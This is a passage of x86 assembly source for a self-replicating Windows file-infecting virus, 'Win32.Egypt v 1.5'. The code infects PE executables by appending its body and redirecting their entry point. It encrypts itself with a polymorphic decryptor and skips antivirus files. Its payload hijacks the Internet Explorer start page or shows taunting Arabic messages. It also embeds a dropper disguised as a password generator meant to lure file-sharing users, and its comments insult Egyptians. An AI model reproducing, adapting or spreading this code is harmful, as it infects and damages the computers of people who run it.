pop esi ; bumblebee ;)
lea edi,avStrings+ebp
mov ecx,vStringsCout
testIfAvL:
push esi
mov ax,word ptr [edi]
testAvLoop:
cmp word ptr [esi],ax
jne contTestLoop
pop esi
ret
contTestLoop:
inc esi
cmp byte ptr [esi+3],0
jne testAvLoop
pop esi
add edi,2
loop testIfAvL
push edx
push ebp
mov eax,offset wfd
add eax,ebp
push eax
push edx
call [_FindFirstFileA+ebp]
pop ebp
push eax
call [ebp+_FindClose]
mov edx, [ebp+wfd.dwFileAttributes]
test edx, 800h ; Avoid compressed
je conttt ; files
pop edx
ret
conttt:
test edx,4h
je contttt
pop edx
ret
contttt:
pop edx
mov esi,edx
mov edi,ebp
add edi,offset wfd.cFileName
@morecopy:
lodsb
stosb
cmp al,0
jne @morecopy
lea esi,[ebp+wfd.cFileName]
push 80h
push edx
apicall _SetFileAttributesA
call OpenFile
cmp_ eax,CantOpen
mov dword ptr [ebp+FileHandle],eax
mov ecx,dword ptr [ebp+wfd.nFileSizeLow]
call CreateMap
cmp_ eax,CloseFile
mov dword ptr [ebp+MapHandle],eax
mov ecx,dword ptr [ebp+wfd.nFileSizeLow]
call MapFile
cmp_ eax,UnMapFile
mov dword ptr [ebp+MapAddress],eax
mov esi,eax
mov esi,[esi+3Ch]
add esi,eax
mov ecx,dword ptr [esi];
xor cx,"7f"
cmp cx,"EP"xor"7f"
jnz NoInfect
test word ptr [esi+16h],2000h ; Don't infect dlls
jnz NoInfect
cmp dword ptr [esi+mark],012345678h ; Was it infected?
jz NoInfect
push dword ptr [esi+3Ch]
push dword ptr [ebp+MapAddress]
apicall _UnmapViewOfFile
push dword ptr [ebp+MapHandle]
apicall _CloseHandle
pop ecx
mov eax,dword ptr [ebp+wfd.nFileSizeLow]
add eax,[ebp+viruslen]
call Align
xchg ecx,eax
call CreateMap
cmp_ eax,CloseFile
mov dword ptr [ebp+MapHandle],eax
mov ecx,dword ptr [ebp+NewSize]
call MapFile
cmp_ eax,UnMapFile
mov dword ptr [ebp+MapAddress],eax
; I would like to thank billy for the PE infection algorithm
mov esi,eax
mov esi,[esi+3Ch]
add esi,eax
mov edi,esi
movzx eax,word ptr [edi+06h]
dec eax
imul eax,eax,28h
add esi,eax
add esi,78h
mov edx,[edi+74h]
shl edx,3
add esi,edx
mov eax,[edi+28h]
mov dword ptr [ebp+ori_eip],eax
mov edx,[esi+10h]
mov ebx,edx
add edx,[esi+14h]
push edx
mov eax,ebx
add eax,[esi+0Ch]
mov [edi+28h],eax
mov dword ptr [ebp+NewEIP],eax
mov eax,[esi+10h]
add eax,[ebp+viruslen]
mov ecx,[edi+3Ch]
call Align
mov [esi+10h],eax
mov [esi+08h],eax
pop edx
mov eax,[esi+10h]
add eax,[esi+0Ch]
mov [edi+50h],eax
or dword ptr [esi+24h],section_flags
mov dword ptr [edi+mark],012345678h
lea esi,[ebp+code_start]
xchg edi,edx
add edi,dword ptr [ebp+MapAddress]
mov [ebp+fromhere], edi
mov ecx, enc-code_start ; code_len
rep movsb
no_null_key:
call random32
cmp al,0ffh
je no_null_key ; Avoid 0 keys
cmp ah,068h
je no_null_key
mov byte ptr[ebp+key2],al
xor byte ptr[ebp+key2],0ffh
mov bl,al
mov byte ptr [ebp+key],ah
xor byte ptr [ebp+key],068h
mov ecx,enc_end-enc
@enc_loop:
lodsb
sub al,bl
neg al
ror al,1
not al
neg al
xor al,ah
stosb
dec ecx
or ecx,ecx
jne @enc_loop
mov ecx,code_end-enc_end
rep movsb
pushad
mov edi,[ebp+fromhere]
add edi,poly_enc-code_start
mov ecx,((poly_end-poly_enc)/4)+1
mov eax,dword ptr[ebp+keyy]
polyenc_loop:
xor dword ptr [edi],eax
add edi,4h
dec ecx
cmp ecx,0h
jne polyenc_loop
popad
mov ecx,[ebp+dec_len]
mov esi,[ebp+decplace]
rep movsb ; now copy the poly decryptor
jmp UnMapFile
NoInfect:
dec byte ptr [ebp+infections]
mov ecx,dword ptr [ebp+wfd.nFileSizeLow]
call TruncFile
UnMapFile:
push dword ptr [ebp+MapAddress]
apicall _UnmapViewOfFile
CloseMap:
push dword ptr [ebp+MapHandle]
apicall _CloseHandle
CloseFile:
mov eax,ebp
add eax,offset wfd.ftCreationTime
push eax
add eax,8
push eax
add eax,8
push eax
push dword ptr [ebp+FileHandle]
apicall _SetFileTime
push dword ptr [ebp+FileHandle]
apicall _CloseHandle
CantOpen:
push dword ptr [ebp+wfd.dwFileAttributes]
lea eax,[ebp+wfd.cFileName]
push eax
apicall _SetFileAttributesA
ret
Align:
push edx
xor edx,edx
push eax
div ecx
pop eax
sub ecx,edx
add eax,ecx
pop edx
ret
TruncFile:
xor eax,eax
push eax
push eax
push ecx
push dword ptr [ebp+FileHandle]
apicall _SetFilePointer
push dword ptr [ebp+FileHandle]
apicall _SetEndOfFile
ret
OpenFile:
xor eax,eax
push eax
push eax
push 00000003h
push eax
inc eax
push eax
push 80000000h or 40000000h
push edx ;esi
apicall _CreateFileA
ret
CreateMap:
xor eax,eax
push eax
push ecx
push eax
push 00000004h
push eax
push dword ptr [ebp+FileHandle]
apicall _CreateFileMappingA
ret
MapFile:
xor eax,eax
push ecx
push eax
push eax
push 00000002h
push dword ptr [ebp+MapHandle]
apicall _MapViewOfFile
ret
;;;;;;;;;;;;;;;;;
; Get System Time
;;;;;;;;;;;;;;;;;
VxGetSystemTime:
push ebp
mov eax,offset st
add eax,ebp
push eax
call [_GetSystemTime+ebp]
pop ebp
ret
;;;;;;;;;;;;;;;;;;
; Get ModuleHandle
;;;;;;;;;;;;;;;;;;
VxGetModuleHandle:
push ebp
push eax
call [_GetModuleHandleA+ebp]
pop ebp
ret
;;;;;;;;;;;;;;;;;
; Get ProcAddress
;;;;;;;;;;;;;;;;;
VxGetProcAddress:
push ebp
push edx
push eax
call [_GetProcAddress+ebp]
pop ebp
ret
payload:
call [ebp+_GetSystemDefaultLCID]
and eax, 0FFFFh
cmp eax, 0c01h ; Arabic (egypt) ?
je arabic_payload
call VxGetSystemTime
cmp word ptr [ebp+wDayOfWeek], 5 ; friday
jnz @@Endp
cmp word ptr [ebp+wDay], 7
jbe @@DoPayload
cmp word ptr [ebp+wDay], 14
jbe @@Endp
cmp word ptr [ebp+wDay], 21
ja @@Endp
@@DoPayload:
lea eax, [ebp+HandleOpenedKey]
push eax
push 000F003Fh
push 0
lea eax, [ebp+IExplorerKey]
push eax
push HKEY_CURRENT_USER
call dword ptr [ebp+_RegOpenKeyExA]
or eax, eax
jnz @@Endp
push pagesize
lea eax, [ebp+page]
push eax
push 1
push 0
lea eax, [ebp+IExplorerValue]
push eax
push dword ptr [ebp+HandleOpenedKey]
call dword ptr [ebp+_RegSetValueExA]
push dword ptr [ebp+HandleOpenedKey]
call dword ptr [ebp+_RegCloseKey] ; Close key handle
@@Endp:
ret
arabic_payload:
mov eax,100
call rndeax
cmp eax,3 ; a 4% probability of msg
jbe doit
ret
doit:
mov eax,((offset offsets_end-offsets)/4)-1
call rndeax
shl eax,2
add eax,ebp
add eax,offset offsets
push MB_ICONEXCLAMATION
mov ebx,ebp
add ebx,offset delta
push ebx
mov eax, dword ptr [eax]
add eax,ebp
push eax
push L 0
call [_MessageBoxA+ebp]
ret
;;;;;;;;;;;;;;;;;;;;;;;;;
;Random Number generators
;;;;;;;;;;;;;;;;;;;;;;;;;
rndeax:
push edx
push ecx
xor edx,edx
push eax
call random32
pop ecx
div ecx
xchg eax, edx
pop ecx
pop edx
ret
irandom32:
call VxGetSystemTime
mov ax,word ptr [st.wMilliseconds +ebp]
shl eax,8
mov dword ptr [ebp+lastrnd],eax
ret
random32:
push ecx
xor ecx, ecx
mov eax, dword ptr [ebp+lastrnd]
mov cx, 33
rloop:
add eax, eax
jnc $+4
xor al, 197
loop rloop
mov dword ptr [ebp+lastrnd], eax
pop ecx
ret
lastrnd dd 0h
;;;;;;;;;;;;
; Data stuff
;;;;;;;;;;;;
a32_string db "ADVAPI32.dll",0
regopen_string db "RegOpenKeyExA",0
regget_string db "RegQueryValueExA",0
close_string db "RegCloseKey",0
Regset db "RegSetValueExA",0
u32_string db "USER32.dll",0
msgbox_string db "MessageBoxA",0
part2 db "\shell\open\command",0
part2_len equ $-offset part2
prog_itself db "Applications\"
prog_buffer db 100h dup (0)
desktop db "\Desktop",0
fileee db "BaNGBUS RaNDOM PASSWORD GENERATOR.EXE",0
; Could you have resisted such a file on kazaa ? ;)
avStrings dw 'VA','NA','RD','DI','DO','BT','-F'
vStringsCout equ (offset $-offset avStrings)/2
page db 'http://www.touregypt.net',0
; Yeah , Come and visit egypt, beautiful country with asshole people ;-)
pagesize equ $ - offset page
IExplorerKey db 'Software\Microsoft\Internet Explorer\Main',0
IExplorerValue db 'Start Page',0
lnk_match db "*.LNK",0
exe_match dd "XE.*" xor "Shit" ; *.EXE
db "E",0
kernel32 dd 0BFF70000h
@@NamezCRC32 label byte
@FindFirstFileA dd 0AE17EBEFh
@FindNextFileA dd 0AA700106h
@FindClose dd 0C200BE21h
@CreateFileA dd 08C892DDFh
@DeleteFileA dd 0DE256FDEh
@SetFilePointer dd 085859D42h
@SetFileAttributesA dd 03C19E536h
@CloseHandle dd 068624A9Dh
@GetCurrentDirectoryA dd 0EBC6C18Bh
@SetCurrentDirectoryA dd 0B2DBD7DCh
@GetWindowsDirectoryA dd 0FE248274h
@GetSystemDirectoryA dd 0593AE7CEh
@CreateFileMappingA dd 096B2D96Ch
@MapViewOfFile dd 0797B49ECh
@UnmapViewOfFile dd 094524B42h
@SetEndOfFile dd 059994ED6h
@GetProcAddress dd 0FFC97C1Fh
@LoadLibraryA dd 04134D1ADh
@GetSystemTime dd 075B7EBE8h
@GetModuleHandleA dd 082b618d4h
@WriteFile dd 021777793h
@GetFileSize dd 0ef7d811bh
@GetFileAttributesA dd 0c633d3deh
@VirtualAlloc dd 04402890eh
@Sleep dd 00ac136bah
@CreateThread dd 019f33607h
@SetThreadPriority dd 01e533f17h
@ResumeThread dd 06087961bh
@lstrcmp dd 06ae4253bh
@lstrcpy dd 0afd8ae51h
@GetSystemDefaultLCID dd 04b410542h
@SetFileTime dd 04B2A3E7Dh
db 0BBh
offsets:
dd offset @1
dd offset @2
dd offset @3
dd offset @4
dd offset @5
dd offset @6
dd offset @7
dd offset @8
dd offset @9
dd offset @10
dd offset @11
dd offset @12
dd offset @13
dd offset @14
dd offset @15
dd offset @16
dd offset @17
dd offset @18
dd offset @19
dd offset @20
offsets_end:
; Funny messages in arabic for the arabic payload
; you will not probably find them funny at all but they
; make sense in arabic ;)
@1 db "<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><> <20><><EFBFBD><EFBFBD><EFBFBD> ",0
; Is he speaking english , Morsi ?
@2 db "<22><><EFBFBD><EFBFBD> <20><> <20><><EFBFBD>Ϳ ",0
; Did you aim at it , smartie ?
@3 db "! <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>",0
; It's all because i have a one hair !
@4 db "<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><> <20><><EFBFBD><EFBFBD> <20>",0
; Who is it ? Mr Lotfi?! I can't believe it !
@5 db "! <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD> <20><> <20><><EFBFBD> <20><> <20><><EFBFBD><EFBFBD> <20><><EFBFBD>",0
; Please Tafida, you know that i love you so much, but i don't
; support your mother !
@6 db "<22> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD> <20> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>",0
; What's up with you Hamdi ? i already told you i am engaged
@7 db "! <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD> <20><><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD>",0
; Don't Cry your heart out, Tahani !
@8 db "<22><><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><> <20><><EFBFBD>",0
; How do you dare talk to me in such a manner, kid ?
@9 db "<22><><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>",0
; String on string and thread on thread
@10 db "! <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>, <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>",0
; Give me my liberty, free my hands !
@11 db "! <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>",0
; El-Lembii
@12 db "! <20><> <20><> <20><><EFBFBD><EFBFBD> , <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD>",0
; No Bouha, you can do everything but this !
@13 db "! <20><> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>",0
; Oh, you sexy smelling butter boxes !
@14 db "<22><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>",0
; Gamal el dawly calls for resolving the football federation
@15 db "<22><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> ",0
; Gamal el dawly threatens Israel with the nuclear weapon !
@16 db "<22><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> ",0
; If El ahly is iron, zamalek would melt it !
@17 db "! <20><><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD>, <20><><EFBFBD><EFBFBD> <20><> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>",0
; Please mohsen, if daddy finds out about it he will cut us into peaces !
@18 db "! <20><> <20><><EFBFBD>, <20><> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>... <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>",0
; Son, it's your time to know the truth, you were born by artificial
; fertilization !
@19 db "<22> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20>",0
; UGH ! who is knocking in such an hour ?
@20 db "! <20><> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>",0
; Come on! I told you i am in need of sleep
advapi32 dd ?
_RegSetValueExA dd ?
_RegOpenKeyExA dd ?
_RegQueryValueExA dd ?
_RegCloseKey dd ?
HandleOpenedKey dd 0
val2 db 0,0
buff_ dd 60h
buff db 60h dup (0)
buff2_ dd 30h
buff2 db 30h dup (0)
haddress dd ?
hmap dd ?
hfile dd ?
ThreadID3 dd ?
olddir db 128 dup (0h)
currdir db 128 dup (1h)
st SYSTEMTIME ?
wfd WIN32_FIND_DATA ?
search_handle dd ?
search_handle2 dd ?
ori_attrib dd ?
infect_counter dd ?
haddress2 dd ?
hmap2 dd ?
hfile2 dd ?
user32 dd ?
_MessageBoxA dd ?
itd_va dd ?
fsize_high dd ?
new_filesize dd ?
file_handle dd ?
map_handle dd ?
map_address dd ?
pe_header dd ?
last_entry dd ?
file_align dd ?
tmp_eip dd ?
size_rawdata dd ?
kernel dd kernel_
infections dd 00000000h
NewSize dd 00000000h
SearchHandle dd 00000000h
FileHandle dd 00000000h
MapHandle dd 00000000h
MapAddress dd 00000000h
AddressTableVA dd 00000000h
NameTableVA dd 00000000h
OrdinalTableVA dd 00000000h
Counter dw 0000h
@@Offsetz label byte
_FindFirstFileA dd 00000000h
_FindNextFileA dd 00000000h
_FindClose dd 00000000h
_CreateFileA dd 00000000h
_DeleteFileA dd 00000000h
_SetFilePointer dd 00000000h
_SetFileAttributesA dd 00000000h
_CloseHandle dd 00000000h
_GetCurrentDirectoryA dd 00000000h
_SetCurrentDirectoryA dd 00000000h
_GetWindowsDirectoryA dd 00000000h
_GetSystemDirectoryA dd 00000000h
_CreateFileMappingA dd 00000000h
_MapViewOfFile dd 00000000h
_UnmapViewOfFile dd 00000000h
_SetEndOfFile dd 00000000h
_GetProcAddress dd 00000000h
_LoadLibraryA dd 00000000h
_GetSystemTime dd 00000000h
_GetModuleHandleA dd 00000000h
_WriteFile dd 00000000h
_GetFileSize dd 00000000h
_GetFileAttributesA dd 00000000h
_VirtualAlloc dd 00000000h
_Sleep dd 00000000h
_CreateThread dd 00000000h
_SetThreadPriority dd 00000000h
_ResumeThread dd 00000000h
_lstrcmp dd 00000000h
_lstrcpy dd 00000000h
_GetSystemDefaultLCID dd 00000000h
_SetFileTime dd 00000000h
; This is a compressed exe file, it will display a faked username
; and password for bangbus when run, included is it's assembly
dropstart:
db 04Dh, 05Ah, 050h, 000h, 001h, 000h, 002h, 000h
db 003h, 000h, 004h, 000h, 001h, 000h, 00Fh, 000h
db 001h, 000h, 0FFh, 0FFh, 000h, 002h, 000h, 0B8h
db 000h, 007h, 000h, 040h, 000h, 001h, 000h, 01Ah
db 000h, 022h, 000h, 001h, 000h, 002h, 000h, 0BAh
db 010h, 000h, 001h, 000h, 00Eh, 01Fh, 0B4h, 009h
db 0CDh, 021h, 0B8h, 001h, 04Ch, 0CDh, 021h, 090h
db 090h, 054h, 068h, 069h, 073h, 020h, 070h, 072h
db 06Fh, 067h, 072h, 061h, 06Dh, 020h, 06Dh, 075h
db 073h, 074h, 020h, 062h, 065h, 020h, 072h, 075h
db 06Eh, 020h, 075h, 06Eh, 064h, 065h, 072h, 020h
db 057h, 069h, 06Eh, 033h, 032h, 00Dh, 00Ah, 024h
db 037h, 000h, 088h, 000h, 050h, 045h, 000h, 002h
db 000h, 04Ch, 001h, 004h, 000h, 001h, 000h, 0F8h
db 032h, 078h, 08Dh, 000h, 008h, 000h, 0E0h, 000h
db 001h, 000h, 08Eh, 081h, 00Bh, 001h, 002h, 019h
db 000h, 001h, 000h, 002h, 000h, 003h, 000h, 006h
db 000h, 007h, 000h, 010h, 000h, 003h, 000h, 010h
db 000h, 003h, 000h, 020h, 000h, 004h, 000h, 040h
db 000h, 002h, 000h, 010h, 000h, 003h, 000h, 002h
db 000h, 002h, 000h, 001h, 000h, 007h, 000h, 003h
db 000h, 001h, 000h, 00Ah, 000h, 006h, 000h, 050h
db 000h, 003h, 000h, 004h, 000h, 006h, 000h, 002h
db 000h, 005h, 000h, 010h, 000h, 002h, 000h, 020h
db 000h, 004h, 000h, 010h, 000h, 002h, 000h, 010h
db 000h, 006h, 000h, 010h, 000h, 00Ch, 000h, 030h
db 000h, 002h, 000h, 0ACh, 000h, 01Ch, 000h, 040h
db 000h, 002h, 000h, 014h, 000h, 053h, 000h, 043h
db 04Fh, 044h, 045h, 000h, 005h, 000h, 010h, 000h
db 003h, 000h, 010h, 000h, 003h, 000h, 002h, 000h
db 003h, 000h, 006h, 000h, 00Eh, 000h, 020h, 000h
db 002h, 000h, 0E0h, 044h, 041h, 054h, 041h, 000h
db 005h, 000h, 010h, 000h, 003h, 000h, 020h, 000h
db 003h, 000h, 002h, 000h, 003h, 000h, 008h, 000h
db 00Eh, 000h, 040h, 000h, 002h, 000h, 0C0h, 02Eh
db 069h, 064h, 061h, 074h, 061h, 000h, 003h, 000h
db 010h, 000h, 003h, 000h, 030h, 000h, 003h, 000h
db 002h, 000h, 003h, 000h, 00Ah, 000h, 00Eh, 000h
db 040h, 000h, 002h, 000h, 0C0h, 02Eh, 072h, 065h
db 06Ch, 06Fh, 063h, 000h, 003h, 000h, 010h, 000h
db 003h, 000h, 040h, 000h, 003h, 000h, 002h, 000h
db 003h, 000h, 00Ch, 000h, 00Eh, 000h, 040h, 000h
db 002h, 000h, 050h, 000h, 068h, 003h, 06Ah, 030h
db 068h, 000h, 001h, 000h, 020h, 040h, 000h, 001h
db 000h, 068h, 02Ah, 020h, 040h, 000h, 001h, 000h
db 06Ah, 000h, 001h, 000h, 0E8h, 013h, 000h, 003h
db 000h, 06Ah, 000h, 001h, 000h, 0E8h, 006h, 000h
db 003h, 000h, 0FFh, 025h, 050h, 030h, 040h, 000h
db 001h, 000h, 0FFh, 025h, 054h, 030h, 040h, 000h
db 001h, 000h, 0FFh, 025h, 05Ch, 030h, 040h, 000h
db 0D5h, 001h, 042h, 041h, 04Eh, 047h, 042h, 055h
db 053h, 020h, 052h, 041h, 04Eh, 044h, 04Fh, 04Dh
db 020h, 050h, 041h, 053h, 053h, 057h, 04Fh, 052h
db 044h, 020h, 047h, 045h, 04Eh, 045h, 052h, 041h
db 054h, 04Fh, 052h, 020h, 062h, 079h, 020h, 061h
db 06Bh, 032h, 038h, 000h, 001h, 000h, 055h, 073h
db 065h, 072h, 06Eh, 061h, 06Dh, 065h, 020h, 03Ah
db 020h, 06Bh, 06Bh, 06Eh, 06Dh, 079h, 079h, 067h
db 040h, 079h, 061h, 068h, 06Fh, 06Fh, 02Eh, 063h
db 06Fh, 06Dh, 00Ah, 050h, 061h, 073h, 073h, 077h
db 06Fh, 072h, 064h, 020h, 03Ah, 020h, 067h, 06Bh
db 034h, 030h, 078h, 078h, 035h, 000h, 0A7h, 001h
db 03Ch, 030h, 000h, 00Ah, 000h, 064h, 030h, 000h
db 002h, 000h, 050h, 030h, 000h, 002h, 000h, 048h
db 030h, 000h, 00Ah, 000h, 071h, 030h, 000h, 002h
db 000h, 05Ch, 030h, 000h, 016h, 000h, 07Ch, 030h
db 000h, 002h, 000h, 090h, 030h, 000h, 006h, 000h
db 09Eh, 030h, 000h, 006h, 000h, 07Ch, 030h, 000h
db 002h, 000h, 090h, 030h, 000h, 006h, 000h, 09Eh
db 030h, 000h, 006h, 000h, 04Bh, 045h, 052h, 04Eh
db 045h, 04Ch, 033h, 032h, 02Eh, 064h, 06Ch, 06Ch
db 000h, 001h, 000h, 055h, 053h, 045h, 052h, 033h
db 032h, 02Eh, 064h, 06Ch, 06Ch, 000h, 003h, 000h
db 047h, 065h, 074h, 04Dh, 06Fh, 064h, 075h, 06Ch
db 065h, 048h, 061h, 06Eh, 064h, 06Ch, 065h, 041h
db 000h, 004h, 000h, 045h, 078h, 069h, 074h, 050h
db 072h, 06Fh, 063h, 065h, 073h, 073h, 000h, 003h
db 000h, 04Dh, 065h, 073h, 073h, 061h, 067h, 065h
db 042h, 06Fh, 078h, 041h, 000h, 056h, 001h, 010h
db 000h, 002h, 000h, 014h, 000h, 003h, 000h, 003h
db 030h, 008h, 030h, 01Ch, 030h, 022h, 030h, 028h
db 030h, 000h, 0EEh, 003h
dropend:
enc_end:
;.386p
;.model flat,stdcall
;extrn ExitProcess:proc
;extrn GetModuleHandleA:proc
;extrn MessageBoxA:proc
;.data
;mb_caption db "BANGBUS RANDOM PASSWORD GENERATOR by ak28",0
;mb_text db "Username : kknmyyg@yahoo.com",10
; db "Password : gk40xx5",0
;.code
;start:
;
; push 00000030h ; Display
; push offset mb_caption ; faked msgbox
; push offset mb_text
; push 0
; call MessageBoxA
;
; push 0 ; End
; call ExitProcess
;end start
;end
;
; 8 Bit decryptor
decrypt:
pop esi
push esi
cmp esi,offset enc
je nodec
xor ecx,ecx
mov al,00h
key equ $-1
mov ah,00h
key2 equ $-1
xor ebx,ebx
push dword ptr fs:[ebx] ; Here is the trick , i get the
pop ebx ; default SEH address and use
xor al,bl ;068h ; it to get the keys to decryption.
xor ah,bh ;0ffh
dec_loop:
xor byte ptr [esi],al ; six 8-bits instructions
neg byte ptr [esi] ; on every byte of the
not byte ptr [esi] ; virus
rol byte ptr [esi],1
neg byte ptr [esi]
add byte ptr [esi],ah
inc esi
inc ecx
cmp ecx,enc_end-enc
jne dec_loop
nodec:
ret
poly_end:
nop
nop
nop
nop
code_end:
poly_dec:
pop eax
pushad
pushfd
push eax
ret
;;;;;;;;;;;;;;;;
; Generation one
;;;;;;;;;;;;;;;;
g1_quit:
push 00000030h
push offset mb_caption
push offset mb_text
push L 0
call MessageBoxA ; Display the message box
push L 0
call ExitProcess ; Exit to OS
mb_caption db "Win32.Egypt v 1.5 ",0
mb_text db "Win32.Egypt has invaded the system",10
db "This is a 1st generation host",0
ends
end code_start